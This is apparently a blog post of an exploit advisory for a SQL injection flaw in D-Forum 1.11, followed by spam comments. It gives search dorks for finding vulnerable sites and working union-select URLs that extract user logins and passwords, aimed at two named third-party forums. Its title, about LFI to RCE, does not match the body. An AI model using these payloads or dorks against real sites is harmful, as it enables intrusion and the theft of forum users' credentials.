LFI to RCE via access_log injection

D-Forum 1.11 SQL Injection Vulnerability

[o] D-Forum 1.11 SQL Injection Vulnerability

Software : D-Forum version 1.11 [previous version affected too]
Vendor : http://www.adalis.fr/dforum
Author : NoGe


[o] Exploit

http://localhost/[path]/nav.php3?page=voirsujet&boardid=1&postid=[SQLi]


[o] Dork

"Powered by D-forum"
"nav.php3?page=voirsujet"


[o] PoC

http://www.enesm.com/forum/nav.php3?page=voirsujet&boardid=x&postid=-null+union+select+1,2,3,group_concat(0x3a,user_login,0x3a,user_pass,0x3a),5,6,7,8,9,10,11,12,13+from+dforum_users--
http://bmxverrieres.free.fr/dforum/nav.php3?page=voirsujet&boardid=x&postid=-null+union+select+1,2,3,group_concat(0x3a,user_login,0x3a,user_pass,0x3a),5,6,7,8,9,10,11,12,13+from+dforum_users--

Comments

Unknown said…
Thanks for one’s marvelous posting! I definitely enjoyed reading it, you can be a great author. I will be sure to bookmark your blog.
online uk
akkonm said…
This comment has been removed by the author.
akkonm said…
Some one hacked my Powered by D-forum in few days but thanks to www.rushessay.org/buy-essay for their supportive topic of hacking which helped me to reveal my website from hacker.